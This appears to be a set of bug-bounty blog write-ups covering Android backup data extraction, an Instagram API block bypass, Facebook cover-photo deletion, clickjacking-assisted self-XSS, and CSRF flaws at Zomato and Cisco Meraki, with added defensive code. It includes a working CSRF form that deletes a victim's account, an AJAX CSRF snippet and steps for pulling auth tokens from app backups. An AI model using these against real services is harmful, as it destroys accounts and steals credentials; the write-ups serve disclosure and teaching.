Finding backup vulnerabilities in android apps

Hi everyone, this post is an elaboration of the 10th point I made in my previous post, which is often missed by devs/hunters while looking for bugs in Android apps. This issue is not new, and it is more a misconfiguration than a vulnerability.

Why look into backups?

Just like any other OS, Android allows users to make a backup of their apps. That's cool, but from our end we are concerned about whether any sensitive information is leaked in the backup and whether it has been loosely configured.

Tools required?

  1. Adb
  2. Abe
  3. Apktool
  4. Genymotion

How to proceed:

  1. To check whether an app allows backup, first reverse the APK and find the manifest file. To do so, execute: apktool d <app-name.apk>
  2. Check the AndroidManifest.xml file for the attribute android:allowBackup="true". If this is present and its value is set to true, it means we can back up the app's internal data, which resides under /data/data/<app-package>
  3. To back up the app, run: adb backup -f <backup-name.ab> <app-package-name>
  4. Accept the backup confirmation on the device.
  5. You will now have the app-backup.ab file in your working directory.
  6. To read it, convert the .ab file into .tar format using the tool Android Backup Extractor.
    Command: java -jar abe.jar unpack app-backup.ab app-backup.tar
  7. Then extract the tar file using: tar xvf app-backup.tar
  8. To make this process shorter, I have written a custom tool, pentdroid, which automates all the above Android operations.
  9. Just select operation 6 for reversing an app, 4 for taking a backup of an app, and finally option 5 to convert the backup.ab into backup.tar.
  10. Once you get the .tar file, extract it using WinRAR.
  11. Once it has been extracted, you will get the folder that resides in the /data/data directory.
  12. Explore the various files, including assets like .db and sharedprefs.xml, and search for sensitive information. Sometimes you will find developer secrets, passwords, auth tokens for APIs, etc.
  13. Here is one such case I came across while reporting to one of the Android programs, where I was able to obtain an auth token stored in one of the .db files.
  14. I used SQLite browser to view the contents of the .db files.
  15. Using the obtained token, we can make calls to the API endpoint to fetch more information.

Why bother about this if we can find something by just rooting the device?

With this you don't need a rooted device to obtain data from the app's internal directory! It also respects the program scope, compared to the other OWASP M2 issues, which require you to have a rooted device.

Any patch or recommendation?

1.) Try to implement SQLCipher, which encrypts the SQLite DB. Check out > http://lomza.totem-soft.com/tutorial-add-sqlcipher-to-your-android-app/

2.) Set android:allowBackup="false" in the Android manifest file to disallow the access.

3.) Also, do not let apps upload backups containing sensitive info in clear text to the cloud.
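
A defender-side check for the steps and recommendations above, as an added example that is not part of the original post or of pentdroid. It reads an apktool-decoded manifest, treating a missing android:allowBackup as enabled (the platform default), and lists sensitive-looking SharedPreferences keys and SQLite columns in an extracted backup; the name patterns and the sample manifest are assumptions.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET
from pathlib import Path

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SENSITIVE = re.compile(r"token|passw|secret|api[_-]?key", re.I)  # assumed patterns

# Constructed sample manifest, not taken from any real app.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.demo">
  <application android:label="Demo" android:allowBackup="true"/>
</manifest>"""


def backup_allowed(manifest_xml):
    """True if the manifest permits backing up the app's private data.

    A missing android:allowBackup counts as allowed: the default is true.
    """
    app = ET.fromstring(manifest_xml).find("application")
    if app is None:
        return False
    return app.get(ANDROID_NS + "allowBackup", "true").lower() != "false"


def scan_backup_tree(root):
    """List (file, container, name) for sensitive-looking prefs and columns."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix == ".xml":
            try:
                tree_root = ET.parse(path).getroot()
            except ET.ParseError:
                continue
            if tree_root.tag != "map":  # SharedPreferences files use <map>
                continue
            hits += [(path.name, "pref", n.get("name")) for n in tree_root
                     if SENSITIVE.search(n.get("name", ""))]
        elif path.suffix == ".db":
            con = sqlite3.connect(path.resolve().as_uri() + "?mode=ro", uri=True)
            try:
                tables = [r[0] for r in con.execute(
                    "SELECT name FROM sqlite_master WHERE type='table'")]
                for table in tables:
                    cols = con.execute(f'PRAGMA table_info("{table}")')
                    hits += [(path.name, table, c[1]) for c in cols
                             if SENSITIVE.search(c[1])]
            except sqlite3.DatabaseError:
                pass  # not plain SQLite, e.g. encrypted with SQLCipher
            finally:
                con.close()
    return hits


if __name__ == "__main__":
    print("backup allowed:", backup_allowed(SAMPLE_MANIFEST))
```

A database that fails to open as plain SQLite is skipped, which is the visible effect of recommendation 1 on a backup.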

#signoff

 

 

 

 


Mobile app security : Bugs which are actually counted

This post is just a few thoughts on VAPT and on security programs for mobile apps. It is not related to mobile OS security | malware research | reverse engineering.

Mobile app security is a buzzword these days and is quite tangled and contradictory in itself. After the arrival of IoT it became even more important to assess your apps to prevent attacks against these systems! But in reality the major culprits have always been the web services running in the background, REST in peace. So the question is what we are actually pentesting: is it the API or the mobile app? And if it's the API, then we are only doing the same Burp stuff we used to do on the web, so what is actual mobile app security?

Just imagine for a while who will give away his/her own iPhone 6 / Android device, that too jailbroken, to find something in plaintext in a plist! Seriously?

There are too many protection levels within the system to prevent the exploitation itself! And infosec guys while reporting be like:

Hi team,
Here is an insecure local storage flaw: imagine that the device has been stolen, rooted & jailbroken.
I dare you if you will say that in the case of iOS.

(okay, just modify it: *we have physical access to the device for a while*)

Rooting or jailbreaking a device will itself give you the highest privilege within the device, so there is no point in reporting insecure local storage, which is termed M2 in OWASP, unless the data is stored with world-readable permission on the sdcard.
Most companies won't give a damn if the app you tested was on a rooted/jailbroken device, and the twist is that the entire OWASP was written with respect to the emulator, which comes pre-rooted.

Below are some knockouts on the face regarding flaws from programs, and half of the OWASP top 10 went off :/ .

That's the reality of acceptance of app-based vulnerabilities. No doubt you will get those issues in any random app from the app store, but they won't have much impact.

I would rather prefer this path, sdcard/android/, instead of this one, data/data.

So what are some accepted issues about mobile apps?

Ans: In general, any bug which has significant impact without having much privilege on the device, even better if you can exploit it remotely, like code execution or web-view exploits! (But I guess these WebKit issues are dead these days.)

Try to pentest with least privilege on an unrooted Android device.
(Now it sounds like your hands + legs are being tied up.)
The next thing you will ask is how to proceed and what is possible on an unrooted device? I will post about it, with a few of my PoCs!

A few of the issues I worked on regarding Android, which helped me and at least count for acceptance, are:

  1. Sensitive information like access_tokens leaked in logs during debugging.
  2. Fragment injections.
  3. Arbitrary code execution, but there are constraints in this too: you need world-readable + writable permissions to overwrite the native libraries, and to execute it remotely you need MITM. And even after doing all that you still get the feeling of an "informative", trust me I was here 😛
  4. XXE: you are lucky if the app is parsing XML entities; you can try apps which parse pdf, docx etc.
  5. Remote code execution via web-views (addJavascriptInterface()).
  6. Sensitive API calls and IDOR.
  7. Exported intents which are helpful in bypassing authentication or screens.
  8. Exported broadcast receivers, like making a phone call by passing params.
  9. Tapjacking at OAuth endpoints, just like the clickjacking issue on the web at OAuth buttons.
  10. Backup issues like android:allowBackup="true", which lets you make a backup of the app and explore the sensitive stuff in it.
  11. Exported components without custom permissions, including activities and receivers [which can also be bypassed].
  12. I consider SSL pinning should be here, but bug bounty programs will still cry because it can be bypassed using Cydia Substrate, SSL killer or Xposed framework modules.

What about iOS?
Ans:

  1. Some of the above issues are relevant to iOS too.
  2. iOS too has web-views, which can be exploited using file Uri:// to trigger FaceTime calls; improper URI schemes can allow attackers to, for example, send unauthenticated tweets and bypass popup blockers.
  3. Check the REST API calls again.
  4. Do traffic analysis.

So:
App-related issues which are found on a jailbroken device don't count unless you have a privilege escalation exploit on the device!

These are some of my own thoughts on mobile app sec, especially related to bug acceptance and feasibility of exploitation, and are not intended to hurt anyone's feelings.

Thanks for reading guys and for being here 🙂
Let me know your thoughts in the comments.

$logout
Vishwa

Exploiting Instagram APIs

Hello friends, it's been a while since I blogged. This time I am writing about one of my old issues. I was checking Instagram, and being a whitehat by heart I went straight into testing its privacy/security measures. XSS, CSRF and OAuth issues were fixed and being hunted down by other folks 😛 so I was checking my favourite part, the API endpoints, and within a few hours I found 4 flaws with the API, i.e.

Pwning calls like GET, PUT, POST, DELETE

GET / https://api.instagram.com/v1/users/{user-id}/media/recent

GET / https://api.instagram.com/v1/media/<media_id>/comments/[comment_id]

PUT / [the Insta API uses few PUT calls; it uses POST for most of the update actions]

POST / https://api.instagram.com/v1/media/{media-id}/likes

DELETE / https://api.instagram.com/v1/media/{media-id}/likes

Attack --> Once user1 blocks user2, user2 won't be able to see, like, share, post or comment on the victim's post, or see who liked the victim's post, right! The same feature exists in Facebook.

Scenario:

The scenario is like this: someone is spamming your Instagram wall, posting abusive stuff on your image, which is very personal and which you don't like.
You now want him removed from your environment and want to keep him away from all your personal stuff,
so you have blocked me now? You think the work is done, but it's not.
The attacker will try to know what's going on with the image, but he can't because you have blocked him, so he cannot interact with your resources. But from the API endpoint there is a flaw: he will make those calls with the media id to like, dislike, see comments, see who liked your post, follows etc.

The interesting thing was that posting comments was restricted! It means the API is still performing some checks on some POST calls, except POST/DELETE /likes, but not on GET calls.

The media_id can easily be figured out via the oEmbed feature in Instagram by just putting in the [url of resource], which allows you to create embed code for the user's post.

Impact: The attacker was not able to perform any of the above actions from the UI, but was able to bypass the above blocks via the API endpoint with his own access_token. Now he can delete likes, create likes, see comments, see who liked the victim's post etc. in authenticated sessions, which violates the block functionality, doesn't it?

Reason behind this?
The application was not verifying whether access_token calls were coming from the original owner or from a blocked user; it was simply serving them.

Initial Instagram design flaw:
The root reason is the initial Instagram design, as it is very open: it lets you see everything in unauthenticated sessions, whereas Facebook has given users the choice of what they want to show or not to outsiders [even in unauthenticated sessions]. So here, no matter what, the application can only apply restrictions in authenticated sessions, because only then can it check whom to allow and whom to restrict. When the user authenticates, Instagram performs only basic checks, hiding the controls and showing a non-interactive page to the blocked user. But exploitation is still possible from the API endpoint, which breaks the basic block function, doesn't it?

[+] Fact: despite their patch I was again able to bypass the Instagram block 😛 so is there no need for the block feature then? Well, let them decide now or in the future; hopefully someone will ping them.

TimeLine:

[13 April 2015] Reported this issue to the team
[14 April 2015] Better PoC provided with video
[16 April 2015] Got a reply asking for more info
[16 April 2015] Info provided
[21 April 2015] Changes were made, asked to confirm
[21 April 2015] Again reproduced the issue
[6 May 2015] Escalated to Product team
[29 September 2015] Team is still working on fix
[10 October 2015] Closed
[10 October 2015] Reopened again
[13 March 2016] Again escalated
[20 April 2016] Issue fixed by the team with no bounty

Changes Made By Team After the Report :

1.) Added a console for API documentation
2.) Added a sandbox approach
3.) Fixed the API and UI consistency

Now all the issues are patched from both endpoints, API and UI.
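
The API/UI consistency point, as an added sketch that is not Instagram's code: every media handler is registered through one decorator that runs the block check first, so likes (GET/POST/DELETE) and comments (GET) cannot diverge the way the post describes. The user names, media id and in-memory data are constructed assumptions.

```python
# Constructed data: "victim" has blocked "attacker"; "friend" is not blocked.
BLOCKS = {("victim", "attacker")}  # (blocker, blocked)
MEDIA_OWNER = {"m1": "victim"}
LIKES = {"m1": {"friend"}}
COMMENTS = {"m1": ["nice pic"]}
ROUTES = {}


class Forbidden(Exception):
    pass


def media_route(method, resource):
    """Register a handler behind the block check, whatever the HTTP verb."""
    def register(handler):
        def guarded(caller, media_id):
            if (MEDIA_OWNER[media_id], caller) in BLOCKS:
                raise Forbidden(f"{caller} is blocked by the owner")
            return handler(caller, media_id)
        ROUTES[(method, resource)] = guarded
        return guarded
    return register


@media_route("GET", "comments")
def list_comments(caller, media_id):
    return list(COMMENTS[media_id])


@media_route("GET", "likes")
def list_likes(caller, media_id):
    return sorted(LIKES[media_id])


@media_route("POST", "likes")
def add_like(caller, media_id):
    LIKES[media_id].add(caller)
    return sorted(LIKES[media_id])


@media_route("DELETE", "likes")
def remove_like(caller, media_id):
    LIKES[media_id].discard(caller)
    return sorted(LIKES[media_id])


def api_call(method, resource, caller, media_id):
    """Dispatch the way the API layer would; returns (status, body)."""
    try:
        return 200, ROUTES[(method, resource)](caller, media_id)
    except Forbidden:
        return 403, None


def statuses_for(caller):
    """Status of every registered route when called by this user on m1."""
    return {route: api_call(*route, caller, "m1")[0] for route in sorted(ROUTES)}


if __name__ == "__main__":
    print("attacker:", statuses_for("attacker"))
    print("friend:  ", statuses_for("friend"))
```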

$logout

Deleting Facebook Event&Group cover pics

Hi Friends 🙂

Here is a small logical flaw with Facebook in the event and group corner.
The title should be: deleting Facebook event & group cover pic with image id reference flaw.

Facebook uses numerical IDs to identify each object like video, url, feed, photos, events, groups etc. So I was checking the event corner and I found a logical flaw with image IDs; I thought about the developer logic while building this.

Test: If any random invitee of the event posts a pic on the event wall, and later that pic is used by the admin of the event as the event cover pic, can we do any malicious stuff with it?

That's straightforward! But what could be wrong with this method? It's the right of an admin to utilize the assets of the event or the object he/she belongs to!

OK, let's dig deeper. For that I first created 2 accounts: A, the admin of the event, and B, a normal user.
Now I posted on behalf of user B, and from the admin account I tried to use that image as the event cover pic. I noticed that FB was assigning the same image id as the one assigned to the original poster B while posting it. So WHAT?

Imagine now that the original poster B is removed by admin A from the event, and now he doesn't have access to assets like notes and pics of that particular event. He cannot interact with them or visit them, right!

But according to the Graph documentation, only the app which created a node has permission to delete it! So user B still has delete rights.

Now exploitation --> on triggering a DELETE request to that image id, like
DELETE /736667463112529
via the Graph API, the result was 200. Boom: now when the admin refreshes the page he will find that the event cover pic has also been deleted, due to the direct reference to the image id.

This flaw was in both Facebook events and groups. I reported this to Facebook under the category malicious use of functionality; however, it was more of a logical flaw that is itself a vulnerability.

But the team was quick to acknowledge the report.

Now the issue has been fixed both on the client side and on the API side.

Fix in place: Now Facebook will generate a unique id for a photo whenever anyone tries to use it as a cover pic, instead of using the same id.

cheers !

 

Exploiting unexploitable/self XSS

There are multiple endpoints where we can get XSS in web apps, but most of the time they are self-XSS 😛 which requires user interaction to trigger. So to make it exploitable or build a PoC we are typically left with 2 options :p

  1. Using clickjacking
  2. Using CSRF

Depending upon which of the above 2 cases is present, we can create a PoC.

So here I will discuss a real example in one of the Yahoo acquisitions, "Polyvore", which I reported.

There were multiple fields vulnerable to XSS. They were self-XSS, but the page was vulnerable to clickjacking, so we can exploit it by putting a relevant XSS vector that bypasses the filter into the fields with the help of the user, by tricking him into playing a game of drag and drop.

That is at least better than a standalone PoC and will at least convince the team :v
I will create a separate post on how to do it via CSRF (no such fantasy involved in that either), but clickjacking involves a little configuration, so this is just a bookmark post in case you get such situations.

So I have written a custom .py script which will create a clickjack-to-XSS PoC. On running the script it will ask you for 2 things:

  1. XSS vector to bypass the filter
  2. Custom clickjack code, which you can create from here

Q.) Why custom clickjack code?

Because there are specific text fields and textareas which are vulnerable and need to be included as part of the game! You will understand better in the video below.

Now you can give this file to the victim!

Greetz to #kotowicz for great work in Clickjacking domain .

That’s all guys 🙂

$ logout

 

 

 

 

 

How i deleted your zomato account !

Hi friends 😀 ,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I got caught up by it, so I was messing around with Zomato. While checking out the settings section I found the "delete my account" option, and after clicking on that a prompt appears.

Now to delete the account you have to type delete inside it and confirm! But there was a flaw: there was no CSRF token available to validate the request!

What is a CSRF token?
A CSRF token is a protective measure used to prevent cross-site request forgery attacks; it checks whether the request is coming from the legitimate user or not!

Now the exploitation part:
I created a quick working code which allows you to delete any user's account, so now to delete his or her account you just need to send this code via HTML or as a link. 😛

Code ?
<html>
<body>
<form action="https://www.zomato.com/php/delete_user_profile.php" method="POST">

<input type="hidden" name="reason" value="woot woot">

<input type="hidden" name="userid" value="[User ID to whom you wanna delete]">

<input type="submit" value="Submit request">

</form>

</body>
</html>

Video Poc :
save this as delete.html and send this to your friend !

https://www.youtube.com/watch?v=fRjdyg6s9rU

Exploitability?

It was easy to grab any user's userid by just visiting their profile and copying that user id, which increased its severity 😉

[+] Fixing Time line

[+] July 21, 2015 Reported to CEO (Report sent to Deepinder Goyal) ,CTO
[+] July 21, 2015 Reported to Support team
[+] Bug Fixed by team .

Let #internet be #safer place 🙂
signoff

Cisco Meraki ajax based csrf

Hello friends 🙂 This is the write-up of my Cisco Meraki findings. I was just 😉 trying a different platform for a change, so I logged in and was playing the game of request and response. After a few back-and-forth requests it was clear that it's an AJAX-based web app, so I started trying for standard security issues like XSS, CSRF, injections etc. Finally I got one in which I was able to disconnect the admin from his own account.

[+] Abstract
When you remove the token from the AJAX request, the request was still getting completed, so I checked again and it wasn't validating the XSRF token, so it was a CSRF.

[+] PoC challenge
The thing is that you can easily create a PoC via Burp for those web apps which send their anti-CSRF tokens in the body, but sometimes you have to struggle with those web apps which send their CSRF tokens in a header, especially AJAX-based ones, like "X-XSRF-Token":"value";

So now I had to create the PoC manually, so I coded this:
var request = new XMLHttpRequest();
// "url" is the POST URL where the web app was sending the data (the request for removal)
request.open('POST', "url", true);

request.send();
console.log(request); // XMLHttpRequest has no log() method

But AJAX has its own security policies to be satisfied first!
Same Origin Policy on AJAX

The same origin policy dictates that an AJAX object's ability to fully communicate on the user's behalf is possible assuming the following conditions are met:
► The protocol used by the AJAX object must be identical to the protocol of the origin page.
► The target port of the AJAX object must be identical to the port of the origin page.
► The domain of the host and the domain of the AJAX object's target host must be identical.

The only thing to do was to use an overly permissive browser ===> IE
So it worked.

[+]Reported

[+] Fixed

Hope this write-up  was helpful
Regards
vishwaraj
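
The server-side check that was missing in both the Zomato form case and the Meraki AJAX case, as an added example that is not code from either vendor or from the posts: a session-bound token is required on every state-changing request, whether it arrives in the X-XSRF-Token header or in a form field. The field name csrf_token, the session ids and the sample requests are constructed assumptions.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: one secret per deployment
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def sign(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Random nonce plus an HMAC that binds it to this session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{sign(session_id, nonce)}"


def token_valid(session_id, token):
    nonce, _, mac = (token or "").partition(".")
    if not nonce or not mac:
        return False
    # Compare as bytes in constant time; str arguments would have to be ASCII.
    return hmac.compare_digest(mac.encode(), sign(session_id, nonce).encode())


def check_request(method, session_id, headers, form):
    """Return the HTTP status the server should answer with.

    The token may arrive in the X-XSRF-Token header (AJAX) or in a
    hidden form field (csrf_token is a hypothetical field name).
    """
    if method.upper() not in STATE_CHANGING:
        return 200
    headers = {k.lower(): v for k, v in headers.items()}
    token = headers.get("x-xsrf-token") or form.get("csrf_token")
    return 200 if token_valid(session_id, token) else 403


# Constructed requests against the logged-in session "sess-A".
GOOD = issue_csrf_token("sess-A")
OTHER = issue_csrf_token("sess-B")  # valid token, but for another session
CASES = {
    "ajax with token": ("POST", {"X-XSRF-Token": GOOD}, {}),
    "ajax, token header removed": ("POST", {}, {}),
    "cross-site form, no token": ("POST", {}, {"reason": "x", "userid": "1"}),
    "token from another session": ("POST", {"X-XSRF-Token": OTHER}, {}),
    "form with token": ("POST", {}, {"csrf_token": GOOD}),
    "plain read": ("GET", {}, {}),
}


def run_cases():
    return {name: check_request(m, "sess-A", h, f)
            for name, (m, h, f) in CASES.items()}


if __name__ == "__main__":
    for name, status in run_cases().items():
        print(status, name)
```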